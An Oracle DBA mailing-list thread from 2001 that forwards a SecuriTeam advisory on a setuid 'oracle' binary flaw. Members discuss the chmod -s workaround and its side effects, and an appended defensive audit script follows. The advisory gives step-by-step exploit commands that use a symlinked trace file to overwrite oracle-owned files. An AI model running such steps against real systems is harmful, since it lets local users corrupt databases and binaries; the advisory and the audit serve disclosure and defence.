Doh! I didn't even consider that. Via SQL*Net works properly of course.

Jared

On Friday 10 August 2001 18:45, John Kanagaraj wrote:
> Joe,
>
> Don't mind if I switch to size 12 font - my eyes are giving out :)
>
> A small correction - If the suid is taken off 'oracle', only 'oracle' will
> be able to log on *locally*, i.e. if you are using ORACLE_SID and login via
> local SQL*Plus or forms/reports. Other *NIX users will receive an 'unable
> to attach to SHM' error. This is because the non-'oracle' user will not
> have permission either to read/write from SHM or the datafiles. They can do
> so only when assuming the privs via SUID on the 'oracle' binary. When
> connecting via SQL*Net, the listener starts up all processes under the
> 'oracle' and thus assume all privs, so any user can connect via SQL*Net. To
> connect locally without errors in this case, set TWO_TASK rather than
> ORACLE_SID.
>
> Hope that clarifies!
> John Kanagaraj
> Oracle Applications DBA
> DB Soft Inc
> Work : (408) 970 7002
>
> -----Original Message-----
> Sent: Friday, August 10, 2001 12:26 PM
> To: Multiple recipients of list ORACLE-L
>
> problem is if you take off the suid but only oracle will be able to log on if
> i remember correctly.
>
> joe
>
> >>> [EMAIL PROTECTED] 08/10/01 12:50PM >>>
> >
> > Anyone come across this before ??
> > Lee
> >
> > The following security advisory is sent to the securiteam mailing list,
> > and can be found at the SecuriTeam web site: http://www.securiteam.com
> >
> > Vulnerability Found In 'oracle' Binary
> > ------------------------------------------------------------------------
> >
> > SUMMARY
> > There is a write permission checking error in the 'oracle' binary that
> > can be used by local users to overwrite any file owned by the oracle
> > user. This would allow a local user to corrupt database files, overwrite
> > existing oracle binaries, etc.
> >
> > DETAILS
> > Vulnerable systems:
> > Oracle version 8.0.5 up to version 8.1.6
> >
> > Temporary solution:
> > Remove the setuid oracle off the oracle binary:
> > # chmod -s oracle
> >
> > Exploit:
> > $ cd /tmp
> > $ mkdir rdbms
> > $ cd rdbms/
> > $ mkdir log
> > $ cd log
> > $
> > $ ls -alc
> > total 8
> > drwxrwxr-x 2 pask pask 4096 dic 14 02:33 .
> > drwxrwxr-x 3 pask pask 4096 dic 14 02:33 ..
> > $ export ORACLE_HOME=/tmp
> > $ export REAL_ORACLE_HOME=/usr/local/oracle/app/oracle/product/8.0.5
> > $ $REAL_ORACLE_HOME/bin/oracle
> > $ ls -alc
> > total 12
> > drwxrwxr-x 2 pask pask 4096 dic 14 02:35 .
> > drwxrwxr-x 3 pask pask 4096 dic 14 02:33 ..
> > -rw-r----- 1 oracle pask 47 dic 14 02:35 ora_24028.trc
> >
> > $ ln -s $REAL_ORACLE_HOME/bin/lsnrctl ./ora_24050.trc
> > $ $REAL_ORACLE_HOME/bin/oracle
> > $ $REAL_ORACLE_HOME/bin/oracle
> > $ $REAL_ORACLE_HOME/bin/oracle
> > $ $REAL_ORACLE_HOME/bin/oracle
> >
> > ========================================
> >
> > This bulletin is sent to members of the SecuriTeam mailing list.
--
Please see the official ORACLE-L FAQ: http://www.orafaq.com
--
Author: Jared Still
  INET: [EMAIL PROTECTED]

Fat City Network Services    -- (858) 538-5051  FAX: (858) 538-5051
San Diego, California        -- Public Internet access / Mailing Lists
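An added audit check for the two conditions this thread turns on, a setuid 'oracle' binary and symlinks planted in the rdbms/log trace directory; it is not from the thread or from Oracle's tooling, and it assumes the $ORACLE_HOME/bin/oracle and $ORACLE_HOME/rdbms/log layout shown in the advisory above.

```shell
#!/bin/sh
# Added example, not from the thread or from Oracle: audits one ORACLE_HOME
# for the conditions discussed above. Assumes the layout the advisory shows:
# $ORACLE_HOME/bin/oracle and the trace directory $ORACLE_HOME/rdbms/log.
# Prints one WARN line per finding; returns 0 when clean, 1 when anything was flagged.
audit_oracle_home() {
    home=$1
    flagged=0
    bin="$home/bin/oracle"
    logdir="$home/rdbms/log"

    if [ -e "$bin" ]; then
        # The advisory's workaround is 'chmod -s oracle'; John's caveat is that
        # local non-'oracle' logins via ORACLE_SID then fail and need TWO_TASK.
        if [ -u "$bin" ]; then
            echo "WARN: $bin is setuid (workaround: chmod -s; local logins then need TWO_TASK)"
            flagged=1
        fi
        if [ -g "$bin" ]; then
            echo "WARN: $bin is setgid"
            flagged=1
        fi
    else
        echo "INFO: $bin not present, skipping mode check"
    fi

    if [ -d "$logdir" ]; then
        # The advisory's exploit plants a symlink named like a trace file so the
        # setuid binary's .trc write lands on an oracle-owned target instead.
        for f in "$logdir"/*; do
            [ -e "$f" ] || [ -L "$f" ] || continue   # unmatched glob, nothing here
            if [ -L "$f" ]; then
                echo "WARN: symlink in trace dir: $f -> $(readlink "$f")"
                flagged=1
            fi
        done
        # A world-writable trace directory lets any local user plant such links.
        if [ -n "$(find "$logdir" -prune -perm -002 -print)" ]; then
            echo "WARN: $logdir is world-writable"
            flagged=1
        fi
    else
        echo "INFO: $logdir not present, skipping trace-dir check"
    fi
    return "$flagged"
}

# Usage: audit_oracle_home "$ORACLE_HOME"
```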